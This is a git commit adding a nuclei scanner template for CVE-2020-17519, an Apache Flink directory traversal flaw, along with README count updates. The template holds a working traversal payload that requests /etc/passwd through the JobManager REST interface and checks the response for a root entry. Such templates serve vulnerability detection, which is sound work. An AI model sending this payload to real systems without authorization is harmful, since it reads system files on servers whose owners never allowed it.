Merge pull request #731 from projectdiscovery/CVE-2020-17519

Adding CVE-2020-17519
2021-01-06 12:39:40 +05:30 · 2021-01-06 12:39:40 +05:30 · f938a9b1ab
parent 02833a9fb3 4c8c34992a
commit f938a9b1ab
2 changed files with 26 additions and 2 deletions
--- a/README.md
+++ b/README.md
@ -15,7 +15,7 @@ An overview of the nuclei template directory including number of templates and H

 | Templates          | Counts                           | Templates                 | Counts                                  |
 | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
-| cves               | 145             | files                     | 48                     |
+| cves               | 146             | files                     | 48                     |
 | vulnerabilities    | 42    | panels                    | 49                    |
 | technologies       | 41       | security-misconfiguration | 28 |
 | workflows          | 17          | tokens                    | 8                    |
@ -151,6 +151,7 @@ An overview of the nuclei template directory including number of templates and H
 │       ├── CVE-2020-16952.yaml
 │       ├── CVE-2020-17505.yaml
 │       ├── CVE-2020-17506.yaml
+│       ├── CVE-2020-17519.yaml
 │       ├── CVE-2020-2096.yaml
 │       ├── CVE-2020-2140.yaml
 │       ├── CVE-2020-23972.yaml
@ -477,7 +478,7 @@ An overview of the nuclei template directory including number of templates and H

 </details>

-**24 directories, 418 files**.
+**24 directories, 419 files**.

 Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 

--- a/cves/2020/CVE-2020-17519.yaml
+++ b/cves/2020/CVE-2020-17519.yaml
@ -0,0 +1,23 @@
+id: CVE-2020-17519
+
+info:
+  name: Apache Flink directory traversal
+  author: pd-team
+  severity: high
+  description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
+
+  # Source: https://github.com/B1anda0/CVE-2020-17519
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body